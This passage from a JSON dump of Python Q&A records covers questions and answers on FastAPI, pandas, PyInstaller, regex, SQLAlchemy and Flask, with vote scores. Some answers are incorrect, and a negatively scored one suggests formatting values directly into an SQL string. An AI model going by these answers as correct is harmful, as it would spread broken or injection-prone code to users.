database, you can just run \"python manage.py migrate\" and all migrations will be executed on the new database. The already-applied migrations will be stored in a table in that database, so that Django always \"remembers\" the migration state of each individual database. Of course, that new database will only have the table structure - no data has been copied yet!\nDoes this answer your question?","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75462560,"CreationDate":"2023-02-15 16:15:04","Q_Score":1,"ViewCount":52,"Question":"I'm reading in a list of samples from a text file, and in that list every now and then there is a \"channel n\" checkpoint. The file is terminated with the text eof. The code works until it hits the eof, which it obviously can't cast as a float:\nlog = open(\"mq_test.txt\", 'r')\ndata = []\nfor count, sample in enumerate(log):\n if \"channel\" not in sample:\n data.append(float(sample))\n \nprint(count)\nlog.close()\n\nSo to get rid of the ValueError: could not convert string to float: 'eof\\n' I added an or to my if like so,\nlog = open(\"mq_test.txt\", 'r')\ndata = []\nfor count, sample in enumerate(log):\n if \"channel\" not in sample or \"eof\" not in sample:\n data.append(float(sample))\n \nprint(count)\nlog.close()\n\nAnd now I get ValueError: could not convert string to float: 'channel 00\\n'\nSo my solution has been to nest the ifs, and that works.\nCould somebody explain to me why the or condition failed though?","Title":"Unexpected behavior using if .. or .. 
Python","Tags":"python,if-statement","AnswerCount":2,"A_Id":75462636,"Answer":"It's a logic issue: \"and\" should be used instead of \"or\". The condition \"channel\" not in sample or \"eof\" not in sample is true for every line, because no line contains both \"channel\" and \"eof\", so the float conversion is attempted on every line. With and, the conversion is only attempted on lines that contain neither marker.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75463993,"CreationDate":"2023-02-15 18:25:05","Q_Score":1,"ViewCount":501,"Question":"I have two scripts:\nfrom fastapi import FastAPI\nimport asyncio\n\napp = FastAPI()\n\n@app.get(\"\/\")\nasync def root():\n a = await asyncio.sleep(10)\n return {'Hello': 'World',}\n\nAnd the second one:\nfrom fastapi import FastAPI\nimport time\n \napp = FastAPI()\n\n@app.get(\"\/\")\ndef root():\n a = time.sleep(10)\n return {'Hello': 'World',}\n\nPlease note the second script doesn't use async. Both scripts do the same thing; at first I thought the benefit of an async script is that it allows multiple connections at once, but when testing the second code, I was able to run multiple connections as well. The results are the same, performance is the same, and I don't understand why we would use the async method. Would appreciate your explanation.","Title":"What does async actually do in FastAPI?","Tags":"python-3.x,asynchronous,async-await,fastapi","AnswerCount":2,"A_Id":75464345,"Answer":"FastAPI Docs:\n\nYou can mix def and async def in your path operation functions as much as you need and define each one using the best option for you. 
FastAPI will do the right thing with them.\nAnyway, in any of the cases above, FastAPI will still work asynchronously and be extremely fast.\n\nBoth endpoints will be executed asynchronously, but if you define your endpoint function asynchronously, it will allow you to use the await keyword and work with asynchronous third-party libraries","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75464645,"CreationDate":"2023-02-15 19:33:13","Q_Score":2,"ViewCount":75,"Question":"I was going through Twitter when I came across the function below\ndef func():\n d = {1: \"I\", 2.0: \"love\", 2: \"Python\"}\n return d[2.0]\nprint(func())\n\nWhen I ran the code, I got Python as the output and I expected it to be love. I know that you cannot have duplicate keys in a dictionary. However, what I want to know is why the Python interpreter considers 2.0 and 2 to be the same and returns the value of 2","Title":"Why does the python interpreter consider 2.0 and 2 to be the same when used as a dictionary key","Tags":"python,function,dictionary","AnswerCount":2,"A_Id":75464741,"Answer":"In your example, the keys 2.0 and 2 are considered the same because their hash values are equal. This is because in Python, float and integer objects can be equal even if they have different types and representations. In particular, 2 == 2.0 and hash(2) == hash(2.0) are both True, so dictionary lookup treats them as the same key, and the later entry 2: \"Python\" simply overwrites the value stored for 2.0.\nThat's why you should use consistent key types in dictionaries: mixing equal integers and floats as keys silently collapses them into one entry.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75466757,"CreationDate":"2023-02-16 00:35:55","Q_Score":1,"ViewCount":62,"Question":"I've installed flake8 in the terminal, but when I try to select a Python linter in VS Code from the command palette I get the following error: \"Command 'Python: Select Linter' resulted in an error (command 'python.setLinter' not found)\". 
I'm on a Mac, version 11.5.2.\nI have seen other solutions for this problem for Windows on Stack Overflow, but I'm not sure how to proceed on a Mac, please advise","Title":"trying to open flake8 on vs code from command palette error on mac","Tags":"python,visual-studio-code,flake8","AnswerCount":1,"A_Id":75466977,"Answer":"There are many possibilities. You can try the following methods:\n\nReinstall the Python extension or use the pre-release version.\nStart VS Code as administrator.\nTry deleting the .vscode folder in the project.","Users Score":-2,"is_accepted":false,"Score":-0.3799489623,"Available Count":1},{"Q_Id":75468479,"CreationDate":"2023-02-16 06:14:37","Q_Score":1,"ViewCount":250,"Question":"I'm using Python 3.7.4 in a venv environment.\nI ran pip install teradataml==17.0.0.3 which installs a bunch of dependent packages, including sqlalchemy.\nAt the time, it installed SQLAlchemy==2.0.2.\nI ran the below code, and received this error:\nArgumentError: Additional keyword arguments are not accepted by this function\/method. 
The presence of **kw is for pep-484 typing purposes\nfrom teradataml import create_context \n\nclass ConnectToTeradata:\n def __init__(self):\n \n host = 'AWESOME_HOST'\n username = 'johnnyMnemonic'\n password = 'keanu4life'\n\n self.connection = create_context(host = host, user = username, password = password)\n\n def __del__(self):\n print(\"Closing connection\")\n self.connection.dispose()\n\nConnectToTeradata()\n\nIf I install SQLAlchemy==1.4.26 before teradataml, I no longer get the error and successfully connect.\nThis suggests SQLAlchemy==2.0.2 is not compatible with teradataml==17.0.0.3.\nI expected installing an older version of teradataml would also install older, compatible versions of dependent packages.\nWhen I install teradataml==17.0.0.3, can I force it to install only compatible versions of dependent packages?","Title":"When installing an old version of a package, can I install only compatible versions of dependent packages?","Tags":"python,python-3.x,sqlalchemy,teradata","AnswerCount":1,"A_Id":75525095,"Answer":"We are aware of the compatibility issues that were introduced in SQLAlchemy package 2.0.x versions. The new 2.0.x package directly affects the Teradata SQL dialect in the teradatasqlalchemy package. As a temporary measure, please downgrade SQLAlchemy to 1.4.46.\nTeradata Engineering is working on making the teradatasqlalchemy package compatible with the newer versions and a new package is slated to be released in March 2023.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75471318,"CreationDate":"2023-02-16 11:02:36","Q_Score":19,"ViewCount":14233,"Question":"Whenever I try to read Excel using\npart=pd.read_excel(path,sheet_name = mto_sheet)\n\nI get this exception:\n\n 'ReadOnlyWorksheet' object has no attribute 'defined_names'\n\nThis is if I use Visual Studio Code and Python 3.11. However, I don't have this problem when using Anaconda. 
Any reason for that?","Title":"'ReadOnlyWorksheet' object has no attribute 'defined_names'","Tags":"python,exception","AnswerCount":3,"A_Id":76009052,"Answer":"Possible workaround: create a new Excel file with the default worksheet name (\"Sheet1\" etc.) and copy and paste the data there.\n(tested on Python 3.10.9 + openpyxl==3.1.1)","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75472653,"CreationDate":"2023-02-16 12:59:08","Q_Score":1,"ViewCount":40,"Question":"The following JSON file (raw data as I am getting it back from an API call):\n{\n \"code\": \"200000\",\n \"data\": {\n \"A\": \"0.43221600\",\n \"B\": \"0.02311155\",\n \"C\": \"0.55057515\",\n \"D\": \"2.15957924\",\n \"E\": \"0.03818908\",\n \"F\": \"0.26853420\",\n \"G\": \"0.15007500\",\n \"H\": \"0.00685843\",\n \"I\": \"0.08500848\"\n }\n}\n\nwill create this output in Pandas when using this code (one column per entry in \"data\"). The result is a dataframe with many columns:\nimport pandas as pd\nimport json \nf = open('file.json', 'r')\nj1 = json.load(f)\npd.json_normalize(j1)\n\n code data.A data.B data.C data.D data.E data.F data.G data.H data.I\n0 200000 0.43221600 0.02311155 0.55057515 2.15957924 0.03818908 0.26853420 0.15007500 0.00685843 0.08500848\n\n\nI guess that Pandas should provide a built-in function with which the data set in the attribute \"data\" could be split into two new columns named \"name\" and \"value\", including a new index. 
But I cannot figure out how that works.\nI would need this output:\n name value\n0 A 0.43221600\n1 B 0.02311155\n2 C 0.55057515\n3 D 2.15957924\n4 E 0.03818908\n5 F 0.26853420\n6 G 0.15007500\n7 H 0.00685843\n8 I 0.08500848","Title":"pandas json dictionary to dataframe, reducing columns by creating new columns","Tags":"python,pandas,dataframe","AnswerCount":3,"A_Id":75472833,"Answer":"pd.DataFrame.from_dict(j1)\nshould give you the result you need","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75475387,"CreationDate":"2023-02-16 16:42:50","Q_Score":1,"ViewCount":180,"Question":"I have a use case where messages from an input_topic get consumed and sent to a list of topics. I'm using producers[i].send_async(msg, callback=callback) where callback = lambda res, msg: consumer.acknowledge(msg). In this case, consumer is subscribed to the input_topic. I checked the backlog of input_topic and it has not decreased at all. Would appreciate it if you could point out how to deal with this. What would be the best alternative?\nThanks in advance!","Title":"Pulsar producer send_async() with callback function acknowledging the sent message","Tags":"apache-pulsar,pulsar,python-pulsar","AnswerCount":1,"A_Id":75485101,"Answer":"Have you checked that consumer.acknowledge(msg) has actually been called? One possibility is that the producer cannot write messages to the topic, and if the producer has an infinite send timeout, you will never get the callback.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75475397,"CreationDate":"2023-02-16 16:43:25","Q_Score":1,"ViewCount":151,"Question":"I have a numpy array with a shape of (3, 4096). However, I need its shape to be (4096, 3). 
How do I accomplish this?","Title":"How to reverse the shape of a numpy array","Tags":"python,python-3.x,numpy,numpy-ndarray","AnswerCount":1,"A_Id":75552015,"Answer":"Use:\narr = arr.T\n(or)\narr = np.transpose(arr)\nwhere arr is your array with shape (3, 4096). Note that arr.reshape(4096, 3) would produce the right shape but scramble the data, because reshape keeps the elements in their original order instead of transposing rows and columns.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75476008,"CreationDate":"2023-02-16 17:38:22","Q_Score":1,"ViewCount":46,"Question":"I have a search program that helps users find files on their system. I would like to have it perform tasks, such as opening the file in an editor or changing the parent shell's directory to the parent folder of the file upon exiting my Python program.\nRight now I achieve this by running a bash wrapper that executes the commands the python program writes to the stdout. I was wondering if there was a way to do this without the wrapper.\nNote:\nsubprocess and os commands create a subshell and do not alter the parent shell. This is an acceptable answer for opening a file in the editor, but not for moving the current working directory of the parent shell to the desired location on exit.\nAn acceptable alternative might be to open a subshell in a desired directory\nexample\n#this opens a bash shell, but I can't send it to the right directory\nsubprocess.run(\"bash\")","Title":"Python execute code in parent shell upon exit","Tags":"python,posix","AnswerCount":1,"A_Id":75476539,"Answer":"This, if doable, will require quite a hack. 
Because the PWD is passed from the shell into the subprocess - in this case, the Python process - as a subprocess-owned variable, changing it won't modify what is in the parent program.\nOn Unix, maybe it is achievable by opening a detachable sub-process that will pipe keyboard strokes into the TTY after the main program exits - I find this the most likely to succeed of any approach.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving the following error while converting a Python file to .exe\nI have tried to uninstall and reinstall pyinstaller but it didn't help. I upgraded conda but am still facing the same error. Please help me resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75640542,"Answer":"The error message you received suggests that the 'pathlib' package installed in your Anaconda environment is causing compatibility issues with PyInstaller. As a result, PyInstaller is unable to create a standalone executable from your Python script.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":3},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving the following error while converting a Python file to .exe\nI have tried to uninstall and reinstall pyinstaller but it didn't help. I upgraded conda but am still facing the same error. 
Please help me resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75640516,"Answer":"I faced the same problem and ran 'conda remove pathlib', but it didn't work - the result was that the package was not found. So I looked in the 'lib' directory, where there was a folder named 'path-list-....'; I deleted it, and it began working!","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75476135,"CreationDate":"2023-02-16 17:49:41","Q_Score":2,"ViewCount":9580,"Question":"I am receiving the following error while converting a Python file to .exe\nI have tried to uninstall and reinstall pyinstaller but it didn't help. I upgraded conda but am still facing the same error. Please help me resolve this issue\nCommand\n(base) G:>pyinstaller --onefile grp.py\nError\nThe 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please remove this package (located in C:\\Users\\alpha\\anaconda3\\lib\\site-packages) using conda remove then try again.\nPython Version\n(base) G:>python --version\nPython 3.9.16","Title":"How to convert python file to exe? The 'pathlib' package is an obsolete backport of a standard library package and is incompatible with PyInstaller","Tags":"python,python-3.x,anaconda,conda,exe","AnswerCount":6,"A_Id":75687401,"Answer":"I've experienced the same problem. I managed to solve it by downgrading pyInstaller to 5.1 (from 5.8) without touching pathlib. 
An additional possibility to consider.","Users Score":6,"is_accepted":false,"Score":1.0,"Available Count":3},{"Q_Id":75478836,"CreationDate":"2023-02-16 23:12:36","Q_Score":1,"ViewCount":71,"Question":"The problem with this program is that the if\/else statements are not working properly. When the answer is \"yes\", the program also prints the question for when the answer is \"no\". Another problem is that it's not printing rate1 when it's supposed to.\n# This program calculates the shipping cost as shown in the slide\ninternational = input(\"Are you shipping internationally (yes or no)? \")\nrate1 = 5\nrate2 = 10\n\nif international.upper() == \"yes\":\n shippingRate = rate2\nelse:\n continental = input(\"Are you shipping continental (yes or no)? \")\n if continental.upper() == \"yes\":\n shippingRate = rate1\n else:\n shippingRate = rate2\n \nprint(\"The shipping rate is \" + (\"%.2f\" % shippingRate))","Title":"I am trying to test a program that prints a shipping rate based on yes or no answers","Tags":"python","AnswerCount":2,"A_Id":75478867,"Answer":"I notice you're comparing the result of .upper() to \"yes\", which can never be equal, because upper() won't ever return lowercase letters.\nBut this code should work with == \"YES\".","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75479380,"CreationDate":"2023-02-17 01:10:27","Q_Score":1,"ViewCount":62,"Question":"I am trying to solve the differential equation 4(y')^3-y'=1\/x^2 in Python. 
I am familiar with the use of odeint to solve coupled ODEs and linear ODEs, but can't find much guidance on nonlinear ODEs such as the one I'm grappling with.\nI attempted to use odeint and scipy but can't seem to implement it properly.\nAny thoughts are much appreciated\nNB: y is a function of x","Title":"Solving nonlinear differential equations in python","Tags":"python,scipy,differential-equations,odeint","AnswerCount":1,"A_Id":75481202,"Answer":"The problem is that you get 3 valid solutions for the direction at each point of the phase space (including double roots). But each selection criterion breaks down at double roots.\nOne way is to use a DAE solver (which does not exist in scipy) on the system y'=v, 4v^3-v=x^-2\nThe second way is to take the derivative of the equation to get an explicit second-order ODE y''=-2\/(x^3*(12*y'^2-1)).\nBoth methods require the selection of the initial direction from the 3 roots of the cubic at the initial point.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75479740,"CreationDate":"2023-02-17 02:30:10","Q_Score":1,"ViewCount":53,"Question":"While parsing file names of TV shows, I would like to extract information about them to use for renaming. I have a working model, but it currently uses 28 if\/elif statements for every iteration of filename I've seen over the last few years. I'd love to be able to condense this to something that I'm not ashamed of, so any help would be appreciated.\nPhase one of this code repentance is to hopefully grab multiple episode numbers. 
I've gotten as far as the code below, but in the first entry it only displays the first episode number and not all three.\nimport re\n\ndef main():\n pattern = '(.*)\\.S(\\d+)[E(\\d+)]+'\n strings = ['blah.s01e01e02e03', 'foo.s09e09', 'bar.s05e05']\n\n #print(strings)\n for string in strings:\n print(string)\n result = re.search(\"(.*)\\.S(\\d+)[E(\\d+)]+\", string, re.IGNORECASE)\n print(result.group(2))\n\nif __name__== \"__main__\":\n main()\n\nThis outputs:\nblah.s01e01e02e03\n01\nfoo.s09e09\n09\nbar.s05e05\n05\n\nIt's probably trivial, but regular expressions might as well be Cuneiform most days. Thanks in advance!","Title":"Is there a way to find (potentially) multiple results with re.search?","Tags":"python,regex","AnswerCount":3,"A_Id":75479780,"Answer":"re.findall instead of re.search will return a list of all matches","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75480557,"CreationDate":"2023-02-17 05:28:01","Q_Score":1,"ViewCount":48,"Question":"I am new to working with Python. I am not able to understand how to send the correct input to the query.\n list_of_names = []\n\n for country in country_name_list.keys():\n list_of_names.append(getValueMethod(country))\n\n sql_query = f\"\"\"SELECT * FROM table1\n where name in (%s);\"\"\"\n \n\n db_results = engine.execute(sql_query, list_of_names).fetchone()\n\n\nGives the error \" not all arguments converted during string formatting\"","Title":"Receiving Error not all arguments converted during string formatting","Tags":"python,sqlalchemy","AnswerCount":2,"A_Id":75480709,"Answer":"If I remember right, there is a simpler solution. If you write curly braces {}, not parentheses (), and you place inside the braces a variable which contains the %s value, it should work. I don't know how SQL works, but you should use one \" on each side, not three.\nSorry, I'm not English. 
Because of this, maybe I haven't helped with the question, because I may not have understood it correctly.","Users Score":-2,"is_accepted":false,"Score":-0.1973753202,"Available Count":1},{"Q_Id":75485006,"CreationDate":"2023-02-17 13:36:35","Q_Score":1,"ViewCount":54,"Question":"I need to find elements on a page by looking for text(), so I use an xlsx file as a database with all the texts that will be searched.\nIt turns out that it is showing the error reported in the title of this post; this is my code:\n search_num = str(\"'\/\/a[contains(text(),\" + '\"' + row[1] + '\")' + \"]'\")\n print(search_num)\n xPathnum = self.chrome.find_element(By.XPATH, search_num)\n print(xPathnum.get_attribute(\"id\"))\n\nprint(search_num) returns = '\/\/a[contains(text(),\"0027341-66.2323.0124\")]'\nDoes anyone know where I'm going wrong? Despite there being similar posts on the forum, none of them solved my problem. Grateful for the attention","Title":"TypeError: Failed to execute 'evaluate' on 'Document': The result is not a node set, and therefore cannot be converted to the desired type","Tags":"python,selenium-webdriver,xpath,selenium-chromedriver","AnswerCount":2,"A_Id":75485323,"Answer":"Looks like you have extra quotes here\nstr(\"'\/\/a[contains(text(),\" + '\"' + row[1] + '\")' + \"]'\")\nTry changing to f\"\/\/a[contains(text(),'{row[1]}')]\"","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75486770,"CreationDate":"2023-02-17 16:18:10","Q_Score":1,"ViewCount":31,"Question":"I have a Pandas dataframe equivalent to:\n 'A' 'B'\n'i1' 'i2' 'i3'\n 1 2 4 3 0\n 1 1 2 3 3\n 1 1 2 1 0\n 1 2 4 0 9\n 1 1 2 2 6\n 2 1 1 1 8\n\nwhere ix are index columns and 'A' and 'B' are normal columns. 
I want to make sure that the indexes are strictly ordered and, when indexes are duplicated, then it is ordered by column 'A'\n 'A' 'B'\n'i1' 'i2' 'i3'\n 1 1 2 1 0\n 1 1 2 2 6\n 1 1 2 3 3\n 1 2 4 0 9\n 1 2 4 3 0\n 2 1 1 1 8\n \n\nWould df.sort_values('A', kind = 'mergesort').sort_index(kind = 'mergesort') do it? And if so, would do it in a stable way? or could the .sort_index() operation disrupt the previous .sort_values() operation in such a way that, for the duplicated indexes, the values of 'A' are no longer ordered?","Title":"Would df.sort_values('A', kind = 'mergesort').sort_index(kind = 'mergesort') be a stable and valid way to sort by index and column?","Tags":"python,pandas,sorting","AnswerCount":1,"A_Id":75487303,"Answer":"When you sort by multiple keys, only the last one is guaranteed to be sorted. The others will be sorted within the previous groups. Finally, the non-key columns will remain sorted in the original order in case of a stable sort such as the mergesort.\nTo answer your question, yes, your method will maintain the original order in case of duplicated keys.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75486790,"CreationDate":"2023-02-17 16:19:46","Q_Score":1,"ViewCount":94,"Question":"Good day. Today I'm trying to send a document generated on the server to the user on the click of a button using Flask.\nMy task is this:\nCreate a document (without saving it on the server). And send it to the user.\nHowever, using a java script, I track the button click on the form and use fetch to make a request to the server. The server retrieves the necessary data and creates a Word document based on it. How can I form a response to a request so that the file starts downloading?\nCode since the creation of the document. 
(The text of the Word document has been replaced)\npython Falsk:\ndocument = Document()\ndocument.add_heading(\"Some head-title\")\ndocument.add_paragraph('Some text')\nf = BytesIO()\ndocument.save(f)\nf.seek(0)\nreturn send_file(f, as_attachment=True, download_name='some.docx')\n\nHowever, the file does not start downloading.\nHow can I send a file from the server to the user?\nEdits\nThis is my js request.\nfetch('\/getData', {\n method : 'POST',\n headers: {\n 'Accept': 'application\/json',\n 'Content-Type': 'application\/json'\n },\n body: JSON.stringify({\n someData: someData,\n })\n})\n.then(response => \n response.text()\n)\n.then(response =>{\n console.log(response);\n});\n\nThis is my html\n
\n